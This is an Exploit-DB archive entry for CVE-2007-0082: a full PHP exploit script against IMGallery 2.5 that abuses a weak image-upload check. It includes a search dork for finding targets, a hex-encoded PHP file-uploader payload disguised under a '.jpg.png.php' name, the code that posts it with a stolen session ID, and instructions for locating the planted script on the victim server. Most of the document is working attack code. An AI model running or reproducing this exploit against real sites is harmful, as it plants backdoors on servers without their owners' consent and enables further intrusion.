IMGallery <= 2.5 Create Uploader Script Exploit

2006-12-30T00:00:00
ID EDB-ID:3049
Type exploitdb
Reporter Kacper
Modified 2006-12-30T00:00:00

Description

IMGallery <= 2.5 Create Uploader Script Exploit. CVE-2007-0082. Webapps exploit for php platform

                                        
                                            &lt;?

//Kacper Settings 
$exploit_name = "IMGallery &lt;= 2.5 Create Uploader Script Exploit";
$script_name = "IMGallery 2.5";
$script_site = "http://www.imgallery.zor.pl/";
$dork = '"Powered by IMGallery"';
//**************************************************************


print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 

[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)


========&gt;  DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam  &lt;========
========&gt;         http://www.rahim.webd.pl/            &lt;========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)

Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

 and
 
Dr Max Virus
TamTurk,
hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                Greetings for 4ll Fusi0n Group members ;-)
                and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';


/*

Exploit works only when in script user can upload own photos :)

~~~~~~~~~~~~~
in file users_adm/start1.php:
....
$rozm = $_FILES['obraz']['size'];
if($rozm &gt; $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}

//ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$typ_pliku = $_FILES['obraz']['type'];



switch($typ_pliku)             //&lt;------------{1}
        {
                case 'image/jpeg':
                        $pref_gd = "jpeg";
                        break;
                case 'image/png':
                        $pref_gd = "png";
                        break;
               case 'image/pjpeg':
                        $pref_gd = "jpeg";
                        break;
        }



//koniec ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD


$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku         //&lt;------------{2}
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku  //&lt;------------{3}

//zamienia polskie litery z jêzyczkami aby nie znalaz³y siê w nazwie fotki
$nazwa_zmieniona = strtolower($nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace(" ","_",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("±","a",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ê","e",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¼","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¿","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ó","o",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("³","l",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¶","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¦","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("æ","c",$nazwa_zmieniona);

$file = "../obrazy/".$nazwa_zmieniona.""; //dodaje adres i nazwê zdjêcia do zmiennej, która jet tak¿e wykorzystywana podczas tworzenia miniatury w pliku create_min

move_uploaded_file($_FILES['obraz']['tmp_name'],"../obrazy/".$nazwa_zmieniona);//wgrywa plik na serwer     //&lt;------------{4}

chmod($file, 0755);
....

we can upload file *.php
np. hauru.jpg.png.php  &lt;---- :)

script rename file to:
....
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku 
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku
....

to check correct name of file:
&lt;?
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = "hauru.jpg.png.php";
echo "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku
?&gt;

to find you uploaded file go to:

http://site.com/IMGallery path/obrazy/(youfile)

greetz ;)
*/
if ($argc&lt;4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path session_id OPTIONS
host:       target server (ip/hostname)
path:       IMGallery path
session id: you user sessionid
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998 -P1.1.1.1:80
-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$sid=$argv[3];


$port=80;
$proxy="";
for ($i=3; $i&lt;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp&lt;&gt;"-p") and ($temp&lt;&gt;"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$hauru=
"\x3c\x3f\x70\x68\x70\x20\x0d\x0a\x69\x66\x28\x69\x73\x73\x65\x74".
"\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x75\x70\x6c\x5f\x66\x69\x6c".
"\x65\x73\x27\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f".
"\x20\x27\x62\x75\x74\x74\x6f\x6e\x20\x63\x6c\x69\x63\x6b\x65\x64".
"\x27\x3b\x20\x0d\x0a\x20\x20\x2f\x2f\x70\x72\x69\x6e\x74\x5f\x72".
"\x28\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c\x65\x5f\x6e".
"\x27\x5d\x29\x3b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f\x20\x27\x3c".
"\x68\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x24\x75\x70\x5f\x6d\x61".
"\x73\x20\x3d\x20\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c".
"\x65\x5f\x6e\x27\x5d\x3b\x20\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f".
"\x6e\x61\x6d\x65\x20\x3d\x20\x61\x72\x72\x61\x79\x28\x29\x3b\x20".
"\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f\x74\x6d\x70\x20\x3d\x20\x61".
"\x72\x72\x61\x79\x28\x29\x3b\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28".
"\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b".
"\x2b\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x69\x66\x28\x21\x65\x6d".
"\x70\x74\x79\x28\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d".
"\x65\x27\x5d\x5b\x24\x69\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x20".
"\x20\x20\x20\x24\x6a\x20\x3d\x20\x63\x6f\x75\x6e\x74\x28\x24\x6d".
"\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x0d\x0a\x20\x20\x20\x20".
"\x20\x20\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x5b\x24\x6a\x5d\x20".
"\x3d\x20\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d\x65\x27".
"\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x24".
"\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x6a\x5d\x20\x3d\x20\x24\x75".
"\x70\x5f\x6d\x61\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27".
"\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d".
"\x20\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x66\x6f\x72".
"\x28\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x63\x6f\x75\x6e\x74\x28".
"\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x24\x69\x2b\x2b".
"\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x24\x75\x70\x6c\x5f\x66\x69".
"\x6c\x65\x20\x3d\x20\x27\x2e\x2f\x27\x2e\x24\x6d\x61\x73\x5f\x6e".
"\x61\x6d\x65\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x69".
"\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f".
"\x66\x69\x6c\x65\x28\x24\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x69".
"\x5d\x2c\x20\x24\x75\x70\x6c\x5f\x66\x69\x6c\x65\x29\x29\x7b\x20".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x61".
"\x20\x68\x72\x65\x66\x3d\x22\x27\x2e\x24\x6d\x61\x73\x5f\x6e\x61".
"\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x22\x3e\x27\x2e\x24\x6d\x61\x73".
"\x5f\x6e\x61\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x3c\x2f\x61\x3e\x3c".
"\x62\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d\x20".
"\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x7d\x20\x0d\x0a".
"\x3f\x3e\x20\x0d\x0a\x0d\x0a\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63".
"\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f".
"\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x6d\x65\x74\x68\x6f".
"\x64\x3d\x22\x70\x6f\x73\x74\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d".
"\x22\x22\x3e\x20\x0d\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65".
"\x3d\x22\x70\x61\x64\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b".
"\x20\x62\x6f\x72\x64\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c".
"\x69\x64\x20\x23\x63\x63\x63\x63\x63\x63\x3b\x20\x77\x69\x64\x74".
"\x68\x3a\x20\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x3c\x3f".
"\x70\x68\x70\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28\x24\x69\x3d\x30".
"\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b\x2b\x29\x7b\x20".
"\x0d\x0a\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x70\x3e\x3c".
"\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65".
"\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x5f\x6e\x5b\x5d".
"\x22\x3e\x3c\x2f\x70\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x7d".
"\x20\x0d\x0a\x3f\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d".
"\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x70\x61\x64".
"\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b\x20\x62\x6f\x72\x64".
"\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c\x69\x64\x20\x23\x63".
"\x63\x63\x63\x63\x63\x3b\x20\x6d\x61\x72\x67\x69\x6e\x2d\x74\x6f".
"\x70\x3a\x20\x31\x30\x70\x78\x3b\x20\x77\x69\x64\x74\x68\x3a\x20".
"\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x20\x20\x3c\x69\x6e".
"\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x73\x75\x62\x6d\x69\x74".
"\x22\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x5f\x66\x69\x6c\x65".
"\x73\x22\x20\x76\x61\x6c\x75\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64".
"\x22\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d\x0a\x3c\x2f".
"\x66\x6f\x72\x6d\x3e\x20";
$data.='---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="urljump"

start.php?kategoria_form=2&PHPSESSID='.$sid.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="obraz"; filename="hauru.jpg.png.php"
Content-Type: text/plain

'.$hauru.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="opis"

DEVIL TEAM ;-)
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit"

Dodaj
---------------------------7d61bcd1f033e--';
echo "You date code1:\n";
echo Date("His");
echo "\n";
$tim1 = Date("His");
echo "upload Hauru!! (step 1)...\n";
$packet ="POST ".$p."users_adm/start.php?kategoria_form=2&PHPSESSID=".$sid." HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Cookie: PHPSESSID=".$sid.";\r\n";
$packet.="Cookie: odwiedziny=zaliczone;\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
echo "You date code2:\n";
echo Date("His");
$tim2 = Date("His");
sleep(1);
echo "\n";
echo "check you localisation of upload script: $tim1\n";
echo 'Find you upload script: http://'.$host.$path.'obrazy/'.$tim2.'hauru.jpg.png.php';
echo "\n";
echo "or search between $tim1 and $tim2\n";
echo "\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
?&gt;

# milw0rm.com [2006-12-30]